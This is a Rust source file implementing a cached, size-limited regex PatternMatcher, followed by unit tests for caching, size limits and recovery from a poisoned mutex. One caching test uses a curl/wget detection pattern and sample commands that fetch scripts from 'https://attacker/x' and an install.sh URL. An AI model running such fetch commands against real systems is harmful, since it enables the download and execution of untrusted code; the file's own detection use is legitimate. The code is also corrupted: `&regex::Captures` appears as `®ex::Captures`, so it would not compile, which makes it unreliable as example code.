use crate::ports::{Captures, CompiledPattern, PatternError, PatternMatch, PatternMatcher};
use regex::{Regex, RegexBuilder};
use std::collections::HashMap;
use std::sync::{Arc, Mutex};
/// Limit passed to `RegexBuilder::size_limit` for every pattern compiled here (8 MiB).
const REGEX_NFA_SIZE_LIMIT: usize = 8 << 20;
/// Limit passed to `RegexBuilder::dfa_size_limit` for every pattern compiled here (8 MiB).
const REGEX_DFA_SIZE_LIMIT: usize = 8 << 20;
/// Compiles `pattern` with this module's NFA and lazy-DFA size limits applied.
///
/// # Errors
/// Propagates the `regex` crate's error when `pattern` is not valid syntax or when
/// compilation exceeds the configured size limit.
fn build_bounded_regex(pattern: &str) -> Result<Regex, regex::Error> {
    let mut builder = RegexBuilder::new(pattern);
    builder
        .size_limit(REGEX_NFA_SIZE_LIMIT)
        .dfa_size_limit(REGEX_DFA_SIZE_LIMIT);
    builder.build()
}
/// [`PatternMatcher`] implementation backed by the `regex` crate.
///
/// Compiled regexes are memoized per pattern string. Because the cache sits behind an
/// `Arc`, clones of a matcher share the same cache.
#[derive(Clone, Debug, Default)]
pub struct RegexPatternMatcher {
    /// Pattern source text -> compiled regex, guarded by a mutex. Nothing in this file
    /// removes entries, so the map only grows.
    cache: Arc<Mutex<HashMap<String, Arc<Regex>>>>,
}
impl RegexPatternMatcher {
    /// Creates a matcher whose regex cache starts out empty.
    #[must_use]
    pub fn new() -> Self {
        Self::default()
    }

    /// Returns the compiled regex for `pattern`, compiling and memoizing it on a miss.
    ///
    /// Compilation runs without holding the lock. If another caller stores the same
    /// pattern in the meantime, that stored entry wins and is returned.
    ///
    /// Returns `None` and logs a warning when `pattern` fails to compile under the size
    /// limits. Failures are not cached, so a bad pattern is retried on every call.
    ///
    /// A poisoned mutex is recovered via `PoisonError::into_inner` rather than treated
    /// as an error.
    fn cached(&self, pattern: &str) -> Option<Arc<Regex>> {
        // Fast path: the guard is a temporary, released at the end of this statement.
        let existing = self
            .cache
            .lock()
            .unwrap_or_else(std::sync::PoisonError::into_inner)
            .get(pattern)
            .map(Arc::clone);
        if existing.is_some() {
            return existing;
        }

        let compiled = match build_bounded_regex(pattern) {
            Ok(re) => Arc::new(re),
            Err(e) => {
                tracing::warn!("Invalid or oversized regex pattern '{pattern}': {e}");
                return None;
            }
        };

        let mut cache = self
            .cache
            .lock()
            .unwrap_or_else(std::sync::PoisonError::into_inner);
        // `entry` keeps whichever regex was stored first if we raced another caller.
        let winner = cache
            .entry(pattern.to_owned())
            .or_insert_with(|| Arc::clone(&compiled));
        Some(Arc::clone(winner))
    }
}
/// Converts one `regex` match into the port-level [`PatternMatch`].
///
/// The start/end offsets are copied as reported by `regex::Match`, and the matched
/// slice is copied into an owned `String`.
fn match_to_pattern(found: regex::Match<'_>) -> PatternMatch {
    let matched_text = String::from(found.as_str());
    PatternMatch {
        start: found.start(),
        end: found.end(),
        matched_text,
    }
}
fn captures_to_groups(caps: ®ex::Captures<'_>) -> Captures {
let groups = caps
.iter()
.map(|opt| opt.map(match_to_pattern))
.collect::<Vec<_>>();
Captures::new(groups)
}
/// Trait methods that take a pattern string go through the per-pattern cache; an
/// uncompilable pattern yields an empty result (or `false`) rather than an error.
/// `compile` bypasses the cache and reports compilation failures to the caller.
impl PatternMatcher for RegexPatternMatcher {
    fn find_matches(&self, pattern: &str, text: &str) -> Vec<PatternMatch> {
        self.cached(pattern)
            .map(|re| re.find_iter(text).map(match_to_pattern).collect::<Vec<_>>())
            .unwrap_or_default()
    }

    fn is_match(&self, pattern: &str, text: &str) -> bool {
        if let Some(re) = self.cached(pattern) {
            re.is_match(text)
        } else {
            false
        }
    }

    fn captures_iter(&self, pattern: &str, text: &str) -> Vec<Captures> {
        self.cached(pattern)
            .map(|re| {
                re.captures_iter(text)
                    .map(|caps| captures_to_groups(&caps))
                    .collect::<Vec<_>>()
            })
            .unwrap_or_default()
    }

    /// Compiles `pattern` once and returns closures that all share that one regex.
    fn compile(&self, pattern: &str) -> Result<CompiledPattern, PatternError> {
        let shared = build_bounded_regex(pattern)
            .map(Arc::new)
            .map_err(|e| PatternError::InvalidPattern(e.to_string()))?;

        let for_find = Arc::clone(&shared);
        let find = move |text: &str| -> Vec<PatternMatch> {
            for_find.find_iter(text).map(match_to_pattern).collect()
        };

        let for_probe = Arc::clone(&shared);
        let probe = move |text: &str| for_probe.is_match(text);

        // The last closure takes ownership of the original `Arc`.
        let captures = move |text: &str| -> Vec<Captures> {
            shared
                .captures_iter(text)
                .map(|caps| captures_to_groups(&caps))
                .collect()
        };

        Ok(CompiledPattern::new(
            Box::new(find),
            Box::new(probe),
            Box::new(captures),
        ))
    }
}
// Unit tests for `RegexPatternMatcher`: match results, compile-once caching,
// size-limit rejection, and recovery from a poisoned cache mutex. Several tests
// inspect the private `cache` field directly, which is why they live in this module.
#[cfg(test)]
mod tests {
    use super::*;

    // `find_matches` returns every hit, in the order they appear in the text.
    #[test]
    fn find_matches_returns_every_hit_in_source_order() {
        let matcher = RegexPatternMatcher::new();
        let matches = matcher.find_matches(r"\d+", "abc 123 def 456");
        assert_eq!(matches.len(), 2);
        assert_eq!(matches[0].matched_text, "123");
        assert_eq!(matches[1].matched_text, "456");
    }

    // A valid pattern with no hits yields an empty vector, not an error.
    #[test]
    fn find_matches_returns_empty_when_pattern_absent() {
        let matcher = RegexPatternMatcher::new();
        let matches = matcher.find_matches(r"\d+", "no numbers here");
        assert!(matches.is_empty());
    }

    // One `compile` result answers find / is_match / captures consistently;
    // capture group 0 is the whole match.
    #[test]
    fn compile_shares_state_across_three_operations() {
        let matcher = RegexPatternMatcher::new();
        let compiled = matcher.compile(r"hello\s+world").unwrap();
        let matches = compiled.find_matches("say hello world!");
        assert_eq!(matches.len(), 1);
        assert_eq!(matches[0].matched_text, "hello world");
        assert!(compiled.is_match("say hello world!"));
        assert!(!compiled.is_match("say goodbye"));
        let caps = compiled.captures_iter("say hello world!");
        assert_eq!(caps.len(), 1);
        assert_eq!(caps[0].get(0).unwrap().matched_text, "hello world");
    }

    // An unclosed character class is a syntax error that `compile` surfaces as `Err`.
    #[test]
    fn compile_returns_err_for_invalid_regex_syntax() {
        let matcher = RegexPatternMatcher::new();
        let result = matcher.compile(r"[invalid");
        assert!(result.is_err());
    }

    // Mixing all three trait methods on one pattern, many times over, still leaves
    // exactly one cache entry keyed by the pattern text.
    #[test]
    fn repeated_calls_with_same_pattern_use_cached_regex() {
        let matcher = RegexPatternMatcher::new();
        let pattern = r"\b(curl|wget)\b\s+https?://";
        for _ in 0..16 {
            matcher.find_matches(pattern, "run curl https://example.com/install.sh");
            matcher.is_match(pattern, "fetch wget https://example.com/x");
            matcher.captures_iter(pattern, "exec curl https://attacker/x");
        }
        let cache = matcher.cache.lock().expect("cache mutex poisoned");
        assert_eq!(
            cache.len(),
            1,
            "trait methods must reuse one cached compile per pattern; got {} entries",
            cache.len()
        );
        assert!(cache.contains_key(pattern));
    }

    // Distinct pattern strings get distinct entries; reusing `\d+` adds none.
    #[test]
    fn cache_keys_each_unique_pattern_separately() {
        let matcher = RegexPatternMatcher::new();
        matcher.find_matches(r"\d+", "a 1 b");
        matcher.find_matches(r"[a-z]+", "abc");
        matcher.find_matches(r"\d+", "c 2 d");
        let cache = matcher.cache.lock().expect("cache mutex poisoned");
        assert_eq!(
            cache.len(),
            2,
            "two distinct patterns must produce two cache entries; got {} entries",
            cache.len()
        );
    }

    // A pattern whose compiled form is expected to exceed the size limit is rejected
    // both by `compile` (Err) and by the cached trait methods (empty / false).
    #[test]
    fn compile_rejects_oversized_patterns() {
        let matcher = RegexPatternMatcher::new();
        let pathological = "a{1000000}{2}";
        let result = matcher.compile(pathological);
        assert!(
            result.is_err(),
            "compile MUST reject oversized regexes via size_limit"
        );
        assert!(matcher.find_matches(pathological, "aaa").is_empty());
        assert!(!matcher.is_match(pathological, "aaa"));
    }

    // The three trait methods agree on the same input; group 1 yields each local part
    // in order.
    #[test]
    fn is_match_and_captures_agree_with_find_matches() {
        let matcher = RegexPatternMatcher::new();
        let text = "user@example.com talks to admin@example.com";
        let pattern = r"(\w+)@example\.com";
        assert!(matcher.is_match(pattern, text));
        assert_eq!(matcher.find_matches(pattern, text).len(), 2);
        let caps = matcher.captures_iter(pattern, text);
        assert_eq!(caps.len(), 2);
        assert_eq!(caps[0].get(1).unwrap().matched_text, "user");
        assert_eq!(caps[1].get(1).unwrap().matched_text, "admin");
    }

    // After the cache mutex is poisoned, both lookup paths keep working:
    // - the cache-hit path, for the already-cached `\d+`;
    // - the cache-miss/insert path, for the new `[a-z]+`.
    #[test]
    fn cached_recovers_from_poisoned_mutex() {
        let matcher = RegexPatternMatcher::new();
        // Warm-up: put one entry in the cache while the mutex is still healthy.
        matcher.find_matches(r"\d+", "abc 123");
        assert_eq!(
            matcher
                .cache
                .lock()
                .expect("cache should be healthy after warm-up")
                .len(),
            1,
            "one pattern should be cached after first lookup"
        );
        // Poison the mutex: panic while holding its guard, and catch the panic so the
        // test can continue. The clone shares the same mutex as `matcher`.
        let cache_clone = Arc::clone(&matcher.cache);
        let result = std::panic::catch_unwind(std::panic::AssertUnwindSafe(|| {
            let _guard = cache_clone.lock().expect("lock before poison");
            panic!("intentional test panic to poison mutex");
        }));
        assert!(result.is_err(), "inner panic should have propagated");
        assert!(
            matcher.cache.is_poisoned(),
            "mutex must be poisoned after a panic while holding it"
        );
        // Hit path under a poisoned lock.
        let matches = matcher.find_matches(r"\d+", "xyz 456");
        assert_eq!(matches.len(), 1, "cached must recover from poison");
        assert_eq!(matches[0].matched_text, "456");
        // Miss path (compile + insert) under a poisoned lock.
        let alpha_matches = matcher.find_matches(r"[a-z]+", "abc");
        assert_eq!(alpha_matches.len(), 1);
        assert_eq!(alpha_matches[0].matched_text, "abc");
    }
}